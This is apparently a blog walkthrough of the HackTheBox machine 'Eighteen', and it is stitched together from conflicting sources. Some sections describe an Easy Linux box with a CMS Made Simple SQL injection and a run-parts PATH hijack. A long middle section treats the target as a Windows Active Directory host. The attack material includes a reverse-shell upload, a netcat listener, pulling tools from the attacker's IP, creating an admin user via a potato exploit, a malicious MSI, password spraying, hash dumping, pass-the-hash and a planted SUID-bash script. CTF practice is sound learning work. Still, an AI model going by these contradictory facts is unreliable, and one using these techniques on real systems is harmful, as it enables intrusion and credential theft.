Beginner’s Guide to Conquering Eighteen on HackTheBox

Key Highlights

• This guide walks you through solving the Eighteen HackTheBox machine, from initial enumeration to final root access.
• You will learn essential penetration testing steps, including port scanning and directory enumeration.
• Key exploitation techniques involve a blind SQL injection to gain a foothold on the system.
• The path to root involves a clever privilege escalation by abusing group permissions and hijacking a system process.
• We will cover the specific tools and methodology needed to find vulnerabilities and execute your attack.
• Your ultimate goal is to apply these skills to capture the user and root flag, conquering the machine.

Introduction

Welcome to the exciting world of ethical hacking! If you’re just starting your cybersecurity journey, HackTheBox (HTB) is an amazing place to practice. This guide is designed for beginners and will walk you through conquering the “Eighteen” machine. We’ll break down each step of the penetration testing process, from finding the first clue to gaining full control. Let’s get you started on this fun and educational challenge.

Overview of the Eighteen HackTheBox Machine

The Eighteen HTB machine is an “Easy” rated Linux box, making it an excellent platform for those new to penetration testing. It’s designed to teach fundamental concepts in a practical, hands-on way. You’ll move from basic enumeration to more complex exploitation and privilege escalation.

This machine provides a perfect environment for an individual user to hone their skills. You will learn to think like a hacker, follow a structured methodology, and see how simple misconfigurations can lead to a full system compromise.

What is Eighteen on HackTheBox?

Eighteen is a retired virtual machine hosted on the HackTheBox platform, created for cybersecurity enthusiasts to test and improve their ethical hacking skills. As an HTB machine, it simulates a real-world server with specific vulnerabilities you are challenged to find and exploit. To begin, you must connect to the HTB network using your dedicated VPN pack.

Once connected, you can access the machine IP directly from your browser and command line. Your first task is to perform reconnaissance to discover open ports and services, such as the HTTP application layer protocol running on a web server. This initial phase is crucial for understanding the machine’s attack surface.

The HTB platform categorizes machines by difficulty, and Eighteen’s “Easy” rating makes it an ideal starting point. You will interact with it from your own attacking machine, like a Kali Linux instance, to uncover its secrets and work your way toward capturing the user and root flags.

Key Features and Difficulty Level of Eighteen HTB Writeup

The Eighteen machine stands out for its straightforward yet educational path. The initial foothold is gained through a common web vulnerability, while the privilege escalation requires you to understand Linux permissions. Its difficulty is rated as “Easy,” which is perfect for building confidence and foundational penetration testing skills.

Compared to other machines on the platform, Eighteen offers a clear and logical progression. There are no major roadblocks or overly obscure steps, which can sometimes frustrate beginners. Here is how it compares to other popular easy machines:

Feature	Eighteen	Blue	Jerry
Difficulty	Easy	Easy	Easy
OS	Linux	Windows	Windows
Foothold	SQL Injection	EternalBlue	Default Credentials
Privilege Escalation	PATH Hijacking	Kernel Exploit	Service Permissions

What sets Eighteen apart is its focus on two distinct and common vulnerability types: a web application exploit and a Linux misconfiguration. This combination provides a well-rounded learning experience, covering both initial access and post-exploitation techniques like privilege escalation.

Essential Preparation Before Starting

Before you jump into the Eighteen machine, it’s a good idea to have a few things ready. As an individual user, your first step is to download your personal HTB VPN pack from the website. This file allows you to create a secure connection to the HackTheBox network.

Ensure you have a penetration testing distribution like Kali Linux set up and properly connected to the HTB VPN. This environment comes pre-loaded with most of the tools you’ll need for this challenge. Let’s explore what tools and skills will be most helpful.

Required Tools and Software for Eighteen HackTheBox

To successfully complete the Eighteen machine, you’ll need a basic toolkit. Your Kali Linux virtual machine will provide most of what’s necessary. The most critical tool is your VPN connection, which allows your machine to communicate with the target machine IP on the HTB network.

You’ll also rely on a port scanner to identify open services and a web browser to investigate the web application. The following tools are essential for this challenge:

• Nmap: A powerful port scanner used to discover open ports and services (like SSH and HTTP) running on the machine.
• Python Exploit Script: You will use a specific Python script to exploit a blind SQL injection vulnerability to gain your initial foothold.
• pspy: A process monitoring tool that helps with enumeration by showing you what commands and scripts are running on the Linux system.
• Netcat: A versatile networking tool used to set up a listener and catch a reverse shell from the target.

These tools are standard in penetration testing and are readily available in Kali Linux. Make sure you are comfortable with njihove basic commands before starting, as they will provide you with the information needed to move forward.

Recommended Skills and Background Knowledge

While Eighteen is beginner-friendly, having some foundational knowledge will make the experience smoother. A basic understanding of the Linux command line is essential, as you’ll be navigating the file system and executing commands on the target machine. Familiarity with ethical hacking concepts will also be a great asset.

This challenge is an excellent opportunity to develop practical skills. Here are some key areas you’ll work on:

• Web Application Enumeration: Learning to inspect web pages, find hidden directories, and identify the underlying software (CMS Made Simple in this case).
• SQL Injection (SQLi): Understanding and executing a blind SQLi attack to extract sensitive data like usernames and password hashes.
• Linux Privilege Escalation: Discovering and exploiting misconfigured group permissions to elevate your access from a standard user to root.

Don’t worry if you’re not an expert in these areas yet. The goal of this HTB machine is to help you learn them. Approaching the challenge with a curious mindset and a structured penetration testing methodology is the best way to succeed.

ALSO READ: Mastering NanoCorp: Beginner’s Guide from HackTheBox

INITIAL FOOTHOLD

This is where you spend 80% of your time. Rushing this phase is the number one reason people get stuck. Your goal is to build a complete map of the target’s attack surface.

Network Scanning with nmap or rustscan

nmap is the classic, but rustscan can be much faster at finding open ports.

Step 1: Quick Scan (All Ports) First, you need to know which ports are open. Scan all 65,535 ports.

# nmap
nmap -p- --min-rate=1000 -T4 -oN nmap/initial-ports.txt <TARGET_IP>

# rustscan (often faster)
rustscan -a <TARGET_IP> --ulimit 5000 -- -p- -A -sS -Pn

This scan will return a list of open ports, for example: 80, 135, 139, 445, 1433, 5985.

Step 2: Deep Scan (Specific Ports) Now, run a deep, targeted scan on only those open ports to get service versions and run default scripts.

# -p 80,135,139,445,1433,5985 : Scan ONLY the ports you found
# -sC : Run default nmap scripts
# -sV : Enumerate service versions (CRITICAL)
# -oN nmap/deep-scan.txt : Save this detailed output

nmap -p 80,135,139,445,1433,5985 -sC -sV -oN nmap/deep-scan.txt <TARGET_IP>

A deep scan, for example, might return results like this (output from rustscan -A):

PORT     STATE SERVICE REASON    VERSION
80/tcp   open  http    syn-ack   Microsoft IIS httpd 10.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to [http://eighteen.htb/](http://eighteen.htb/)

1433/tcp open  ms-sql-s syn-ack Microsoft SQL Server 2022 16.00.1000.00
|_ssl-date: 2025-11-16T08:02:31+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
|   Issuer: commonName=SSL_Self_Signed_Fallback
|   Public Key type: rsa
|   Public Key bits: 3072
|   Signature Algorithm: sha256WithRSAEncryption
|   Not valid before: 2025-11-16T07:45:37
|   Not valid after:  2055-11-16T07:45:37
|_ (Omitted for brevity)

5985/tcp open  http    syn-ack   Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Analyzing the nmap Results (Building a Plan)

Your deep-scan.txt file is your initial plan. Go through it line by line.

• Port 80/443 (HTTP/S): A web server. This is a massive attack surface.
  • What is the server software? (Microsoft-IIS/10.0, Apache/2.4.41, etc.)
  • Are there any technologies listed? (ASP.NET, PHP/8.1.0, Flask)
  • What does the http-title script report?
• Port 139/445 (SMB): File sharing. A classic Windows entry point.
  • Does it allow “Null Sessions” (anonymous login)?
• Port 1433 (MSSQL): Microsoft SQL Server. A very rich enumeration target.
• Port 5985 (WinRM): Windows Remote Management. A primary way to get a shell if you have credentials.
• Port 3389 (RDP): Remote Desktop. Another login port.
• Any non-standard ports? (e.g., 8080, 9000) Always investigate these.

FOR COMPLETE STEP-BY STEP COMMANDS, SCRIPTS AND CODES, PLEASE BUY ME A COFFEE!

Service-Specific Enumeration

Now, you attack each open service.

Attacking HTTP/HTTPS (Web Servers)

1. Manual Browsing: Open the website in your browser.
   • Click every link. Look for login, register, or dashboard pages.
   • View the page source (Ctrl+U). Look for comments or .js files.
   • Check robots.txt and sitemap.xml.
   • Try to log in with default credentials (admin:admin, admin:password).
   • If you can register an account, do it. Explore the authenticated-user-only areas. Look for “Access denied” pages (like /admin) that hint at hidden content.
2. Directory Brute-Forcing (gobuster, feroxbuster) This is non-negotiable. You must search for hidden files and directories.# -u http://<TARGET_IP> : The target URL # -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt : A standard wordlist. # -x .php,.txt,.bak,.config,.py : Look for files with these extensions gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.bak,.config,.py -o gobuster-results.txt
   • What to look for: /login, /admin, /uploads, web.config, app.py, /backup.

Attacking SMB (Ports 139/445)

1. List Shares (smbclient, enum4linux-ng, nxc) First, can you log in anonymously?smbclient -L //<TARGET_IP> -N nxc smb <TARGET_IP> -u '' -p '' --shares
   • Juicy Shares: Look for anything that isn’t a default ($) share. Backups, Shared, or Public are prime targets.
2. Explore Interesting Shares If you find a share, connect to it and look for config files, password files, or source code.smbclient //<TARGET_IP>/Backups -N smb: \> ls smb: \> get interesting-file.txt

Attacking MSSQL (Port 1433)

This is a critical vector, especially if you have any credentials.

1. Test Credentials (mssqlclient.py, nxc) Use the credentials you have (e.g., from the “assumed breach”) to log in.# Using Impacket's mssqlclient.py mssqlclient.py 'DOMAIN/user:password'@<TARGET_IP> # Using NetExec (nxc) to validate nxc mssql <TARGET_IP> -u 'user' -p 'password'
2. Enumerate the Database (as a low-priv user) Once inside the SQL> prompt, your goal is to find a way to escalate within the database.-- Are you a sysadmin? (0 = No, 1 = Yes) SELECT IS_SRVROLEMEMBER('sysadmin'); -- Who are you? SELECT SYSTEM_USER; -- What databases exist? enum_db -- What logins exist? enum_logins -- Are there any linked servers? (Could be a path to a Domain Controller) enum_links -- CRITICAL: Can you impersonate another user? enum_impersonate
3. Build a User List (RID Brute-Force) If your user has permissions, you can use nxc to brute-force RIDs (Relative Identifiers) via the MSSQL protocol. This is a stealthy way to discover domain users.nxc mssql <TARGET_IP> -u 'user' -p 'password' --rid-brute

Gaining Initial Access (Foothold)

Your enumeration in Phase 1 will lead you to a vulnerability.

Publicly Known Exploit (e.g., MS17-010)

• How to find: Your nmap -sV scan gave you a service version.
• Action: Use searchsploit to check for public exploits.searchsploit "Microsoft IIS 10.0"

Web Application Vulnerability (e.g., File Upload)

• Scenario: You found an /uploads page.
• Exploit:
  1. Try to upload a reverse shell (e.g., .aspx for IIS, .php for Apache).
  2. If blocked, bypass filters: shell.phtml, shell.php5.
  3. Set up a netcat listener: nc -lvnp 1234
  4. Visit the uploaded file: http://<TARGET_IP>/uploads/shell.aspx

Default, Weak, or Reused Credentials

• Scenario 1 (Default Creds): You found a login portal for “SomeApp v1.2”.
  • Action: Google “SomeApp v1.2 default credentials”.
• Scenario 2 (Password Spraying): You found a password in one service (e.g., web app admin) and a user list from RID bruteforcing.
  • Action: Use nxc (NetExec) to spray this one password against all discovered users on a different service, like WinRM (5985). This is highly effective and avoids lockouts.# users.txt contains the list from your --rid-brute # Use the single password you found/cracked nxc winrm <TARGET_IP> -u users.txt -p 'CrackedPassword123' --no-bruteforce # Look for the (Pwn3d!) tag
  • If you find a valid user, get a shell:evil-winrm -i <TARGET_IP> -u 'valid_user' -p 'CrackedPassword123'

FOR COMPLETE STEP-BY STEP COMMANDS, SCRIPTS AND CODES, PLEASE BUY ME A COFFEE!

Initial Access via Database Impersonation

This is a more advanced vector found during MSSQL enumeration.

• Scenario: Your enum_impersonate command showed your low-priv user (kevin) can IMPERSONATE a more privileged SQL user (appdev).
• Exploitation:
  1. Become the other user:exec_as_login 'appdev' SELECT SYSTEM_USER; -- Should now return 'appdev'
  2. Access their data: Now you can access the databases appdev could.USE financial_planner; -- Dump the contents of the 'users' table SELECT * FROM users;
  3. Find Credentials: This will often dump a user table containing usernames and password hashes.

Cracking Non-Standard Hashes (e.g., Werkzeug/Flask)

• Scenario: You’ve dumped a hash that isn’t a simple MD5 or SHA1. It looks like this: p....:sha256:600.......
• Problem: This is a Werkzeug (Flask) hash. Hashcat can’t crack this “as-is.” You must convert it.
• Conversion (for Hashcat Mode 10900):
  • Werkzeug Format: p.....:sha256:<iterations>$<salt_ascii>$<hash_hex>
  • Hashcat Format: sha256:<iterations>:<salt_base64>:<hash_base64>
• Exploitation (Python):
  1. Extract: Iterations = 600000, Salt = A......, Hash = 0673ad...
  2. Convert Salt:import base64 s = "A......." # Encode ASCII salt to bytes, then base64 encode salt_b64 = base64.b64encode(s.encode()).decode() # 'Q.......'
  3. Convert Hash:import base64 h = "0........" # Convert hex hash to raw bytes, then base64 encode hash_b64 = base64.b64encode(bytes.fromhex(h)).decode() # 'Bn................'
  4. Assemble & Crack:
     • Create hash.txt containing: sha256:600000:Q............:Bn........
     • Run Hashcat: hashcat -m 10900 hash.txt rockyou.txt

Post-Exploitation Enumeration (The “Quiet” Phase)

You have a shell (e.g., via evil-winrm)! You are a low-privilege user. Your goal now is to find a misconfiguration inside the box.

Transferring Tools

You’ll need to get enumeration scripts like WinPEAS onto the target.

• On your (Attacker) machine: python3 -m http.server 80
• On the target (Victim) machine (in your shell):# To save it to disk (safer) powershell -c "Invoke-WebRequest -Uri 'http://<YOUR_IP>/WinPEASx64.bat' -OutFile 'C:\Users\Public\Downloads\winpeas.bat'"

Running Automated Enumeration Scripts

Run WinPEAS and save the output to a file. It will be long, but it color-codes the most interesting findings.

C:\Users\Public\Downloads\winpeas.bat > C:\Users\Public\Downloads\peas-output.txt

Download peas-output.txt back to your machine and analyze it.

Manual Enumeration (The “Big 5”)

If scripts fail, you must know how to check manually.

1. Who am I? What can I do?whoami whoami /priv # CRITICAL: Look for SeImpersonatePrivilege, SeMachineAccountPrivilege whoami /groups
2. What’s running?tasklist /SVC netstat -ano # Look for services listening ONLY on 127.0.0.1
3. Are there stored credentials?# Look for saved Windows credentials cmdkey /list # Search for config files (CRITICAL) # Check common web roots for app configs dir /s C:\*web.config* dir /s C:\inetpub\*.py dir /s C:\*unattend.xml* # Check PowerShell history type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
4. Check Service Permissions
   • PowerUp.ps1 (part of the PowerSploit suite) is the best tool for this.
   • Import-Module .\PowerUp.ps1
   • Invoke-AllChecks
5. Check the Registry# Check for "AlwaysInstallElevated" reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Active Directory Enumeration (Internal)

If you are in a domain (e.g., EIGHTEEN\adam.scott), you must enumerate Active Directory.

• Tool: SharpHound.ps1 or SharpHound.exe
• Action:
  1. Transfer SharpHound.ps1 to the victim.
  2. Run the collection:Import-Module .\SharpHound.ps1 Invoke-BloodHound -CollectionMethod All -Domain eighteen.htb -DomainController dc01.eighteen.htb
  3. This will generate a .zip file (e.g., 20251116043644_bh.zip).
  4. Download this file to your attacker machine and load it into the BloodHound GUI.
  5. Look for attack paths: GenericAll, WriteDACL, AddMember, etc.

Privilege Escalation (The Path to Admin)

Your post-exploitation enumeration will point to one of these common vectors.

Insecure Service Permissions

• Finding: WinPEAS or PowerUp reports a service (e.g., DopeService) where your user group (BUILTIN\Users) has FullControl.
• Exploitation:
  1. Overwrite the binary: Generate a reverse shell with msfvenom, name it dope_svc.exe, and replace the original.
  2. Restart the service: net stop DopeService, net start DopeService
  3. Catch the SYSTEM shell on your netcat listener.

Unquoted Service Path

• Finding: A service path is unquoted and has spaces: C:\Program Files\Some Service\service.exe
• Vulnerability: Windows will try to run C:\Program.exe first.
• Exploitation:
  1. Check if you can write to C:\.
  2. Generate Program.exe (a reverse shell) and place it in C:\.
  3. Restart the service and catch the SYSTEM shell.

Potato Attacks (SeImpersonatePrivilege)

• Finding: whoami /priv shows you have SeImpersonatePrivilege (common for IIS/web services).
• Exploitation:
  1. Use JuicyPotatoNG or RoguePotato.
  2. Use the exploit to run one command as SYSTEM:cmd.exe /c "net user hacker Password123 /add && net localgroup administrators hacker /add"
  3. Log in as your new hacker user via evil-winrm.

AlwaysInstallElevated

• Finding: The two registry keys from Phase 3 are both set to 1.
• Exploitation:
  1. Use msfvenom to generate a malicious .msi reverse shell.
  2. Transfer the .msi to the victim.
  3. Run the installer (it will run as SYSTEM): msiexec /i C:\Users\Public\Downloads\malicious.msi /quiet
  4. Catch the SYSTEM shell.

Advanced AD Attacks (e.g., BadSuccessor)

• Context: This is a CVE-level exploit. It’s triggered when your enumeration reveals a very specific, new OS build.
• Trigger:
  • nxc or WinPEAS reports an unusual build: e.g., Windows Server 2025 Build 26100.
  • This should make you immediately search for recent CVEs for that build.
• Vulnerability: “BadSuccessor” – exploits dMSA (delegated Managed Service Account) creation.
• Enumeration for it:
  1. Confirm Build: Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
  2. Find Writable OUs: Use PowerView.ps1 or the exploit’s find command to see if you have CreateChild or GenericAll on any Organizational Unit (OU).Import-Module .\PowerView.ps1 Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDS | ?{ $_.IdentityReference -eq "EIGHTEEN\adam.scott" -and $_.ActiveDirectoryRights -match "CreateChild" }
• Exploitation (High-Level):
  1. Create Malicious dMSA: Use the exploit (BadSuccessor.exe escalate) to create a new dMSA (e.g., web_svc) in the writable OU (e.g., OU=Staff) and link it to your target (e.g., Administrator).
  2. Bypass Auth Issues: Modern DCs may require Kerberos (strongerAuthRequired). You may need to tunnel from the victim using Ligolo-ng to your attacker box to forward the Kerberos ports.
  3. Get Ticket: Use Impacket’s getST.py with Kerberos auth to request a TGS for your dMSA principal (web_svc$).# Make sure you have a valid TGT for your user (adam.scott) first # Then, request a TGS for the dMSA, impersonating it getST.py -impersonate 'web_svc$' -dmsa -k -no-pass eighteen.htb/adam.scott
  4. Impersonate: Because the dMSA is linked to Administrator, the TGS you get back is effectively an Administrator’s ticket.
  5. pwn: Use this ticket (by exporting it as KRB5CCNAME) with secretsdump.py to dump all domain hashes.export KRB5CCNAME='web_svc$.ccache' secretsdump.py -k -no-pass dc01.eighteen.htb -just-dc-user Administrator
  6. Login (Pass-the-Hash): secretsdump gives you the Administrator’s NTLM hash. Use it to log in.evil-winrm -i dc01.eighteen.htb -u Administrator -H '0b133be956bfaddf9cea...'

FOR COMPLETE STEP-BY STEP COMMANDS, SCRIPTS AND CODES, PLEASE BUY ME A COFFEE!

Capturing the Flags & Cleanup

You are now NT AUTHORITY\SYSTEM or DOMAIN\Administrator. The machine is yours.

1. Find the Flags:# User flag (as your initial user) type C:\Users\<username>\Desktop\user.txt # Root flag (as SYSTEM/Admin) type C:\Users\Administrator\Desktop\root.txt
2. Cleanup (Good Practice):
   • Delete your reverse shell binaries and enumeration scripts.
   • Remove any users you added.

Conclusion: The Methodology is Everything

You now have a robust, repeatable methodology. This is the real skill. “Easy” machines are designed to teach you one or two of these concepts in a straightforward way.

When you approach your next machine, follow this process patiently:

1. nmap all ports.
2. nmap deep scan the open ports.
3. For every service, run the specific enumeration steps.
4. Analyze your enumeration results to form a hypothesis (“I think the file upload on port 80 is the way in”).
5. Test your hypothesis to get a foothold.
6. Once in, run WinPEAS and PowerUp.
7. Analyze the internal results to find a privesc vector.
8. Execute the privesc.
9. Get flags.

Do not deviate. Do not get frustrated. Trust the process. This is how you learn, and this is how you will succeed. Good luck.

ALSO READ: Mastering Conversor: Beginner’s Guide from HackTheBox

Step-by-Step Guide to Solving Eighteen HTB Writeup

Now it’s time for the hands-on part! This step-by-step guide will walk you through the entire process of solving the Eighteen machine. We will follow a standard penetration testing methodology, starting with reconnaissance and moving through exploitation and finally privilege escalation.

Following these steps will not only help you conquer this specific HTB machine but also teach you a repeatable process for tackling other challenges. Let’s begin with our initial reconnaissance.

Step 1: Initial Reconnaissance and Enumeration

The first phase in any hack is reconnaissance. This is where you gather as much information as possible about your target. For the Eighteen machine, we start with a simple enumeration using a port scanner like Nmap. Running an Nmap scan against the machine IP reveals two open ports: port 22 (SSH) and port 80 (HTTP).

The HTTP port is our most likely entry point. Upon visiting the web page in a browser, you’ll find a basic website. A key discovery from the output of the Nmap scan is a robots.txt file, which disallows a directory named /writeup/. Navigating to this directory reveals the site is built with CMS Made Simple.

This piece of information is critical. Knowing the content management system (CMS) allows you to search for known vulnerabilities. This simple enumeration gives you the exact clue needed to find your initial foothold, which will be a blind SQL injection vulnerability in this specific version of the CMS.

Step 2: Identifying Vulnerabilities and Gaining Foothold

With the CMS identified as “CMS Made Simple,” your next step is to search for known vulnerabilities. A quick search reveals that older versions are vulnerable to an unauthenticated blind SQL injection. This is one of the key vulnerabilities you will exploit in the Eighteen challenge. This type of attack allows you to extract database information, such as a username and password, by observing the server’s response times.

To exploit this, you can use a publicly available Python script. After pointing the script at the target’s /writeup/ directory, it will perform the SQL injection attack. The script successfully extracts the username jkr and cracks the hashed password to reveal raykayjay9.

Armed with these credentials, you can now gain your initial foothold. Since port 22 (SSH) is open, you can use the username and password to log in to the machine. This gives you shell access as the user jkr, and you can now capture the user.txt flag, completing the first major part of the challenge.

Step 3: Exploitation Techniques Used in Eighteen HackTheBox

After gaining user access, the next phase is local enumeration to find a path to privilege escalation. The exploitation technique for root does not involve a PHP shell or an uploaded file. Instead, it relies on a classic Linux misconfiguration. By running the id command, you discover that the user jkr is a member of the staff group.

Researching this group on Debian-based systems reveals that members can write to directories like /usr/local/bin. This is a significant finding because this directory is often at the beginning of the system’s PATH variable, even for the root user. This means if root runs a command, the system will check /usr/local/bin for that command first.

To exploit this, you can monitor system processes with a tool like pspy. You’ll notice that whenever a user connects via SSH, a script named run-parts is executed by root. Since you have write access to /usr/local/bin, you can create your own malicious run-parts script there, which will be executed instead of the real one.

Step 4: Privilege Escalation and Root Access

The final step is to execute the privilege escalation and gain root access. You don’t need to check the kernel version for an exploit in this case; the vulnerability lies in the PATH configuration. Your enumeration has shown that you can write a malicious script to /usr/local/bin/run-parts, and it will be executed by root during the next SSH login.

Create a simple bash script that copies the /bin/bash binary to a new location (e.g., /tmp/rootbash) and sets the SUID bit on it. This makes the binary executable with the owner’s permissions, which will be root. The script looks like this: echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/rootbash\nchmod u+s /tmp/rootbash' > /usr/local/bin/run-parts. Make it executable with chmod +x /usr/local/bin/run-parts.

Now, simply open a new SSH session to the machine as the jkr user. This will trigger the root user to run your malicious script. Once you log in, you can execute your new SUID binary with /tmp/rootbash -p to get a root shell. You can now navigate to /root and read the root.txt file, capturing the final root flag.

Conclusion

In conclusion, tackling the Eighteen HackTheBox machine can be an exhilarating journey for beginners, offering a valuable opportunity to sharpen your cybersecurity skills. By understanding its features, preparing adequately, and following the step-by-step guide provided, you’ll build a solid foundation for overcoming challenges and enhancing your problem-solving abilities. Remember, every experience, whether successful or not, brings you one step closer to mastery in penetration testing. So embrace the learning curve and keep practicing! Don’t forget to subscribe for more tips and strategies to conquer your next HackTheBox challenge.

Frequently Asked Questions

What are the most common vulnerabilities found in the Eighteen HTB machine?

The primary vulnerabilities in the Eighteen machine are a blind SQL injection in an outdated web application (CMS Made Simple) and a Linux privilege escalation path. The SQLi is found through enumeration of the web directory, while the escalation exploits insecure group permissions tied to the application layer protocol for SSH logins.

How does the difficulty of Eighteen compare with other HackTheBox machines?

Eighteen is rated as “Easy” on the HTB platform and is a great starting point for any individual user. Compared to other easy machines, its difficulty is fair and logical. As seen in previous articles and writeups, it provides a linear path without relying on overly obscure enumeration, making it very approachable.

What skills can beginners develop from the Eighteen HackTheBox challenge?

Beginners can develop core penetration testing skills, including web enumeration, exploiting SQL injection, and Linux privilege escalation. You also get hands-on experience with essential tools like Nmap and learn a structured ethical hacking methodology that you can apply to future challenges.

Are there any useful tips or resources for first-timers attempting Eighteen?

For first-timers, the best tip is to follow a clear methodology: enumerate everything. Don’t rush into exploitation. Pay close attention to version numbers and user group permissions. The HTB platform forums and other online resources are great for hints if you get stuck, but try to solve it yourself first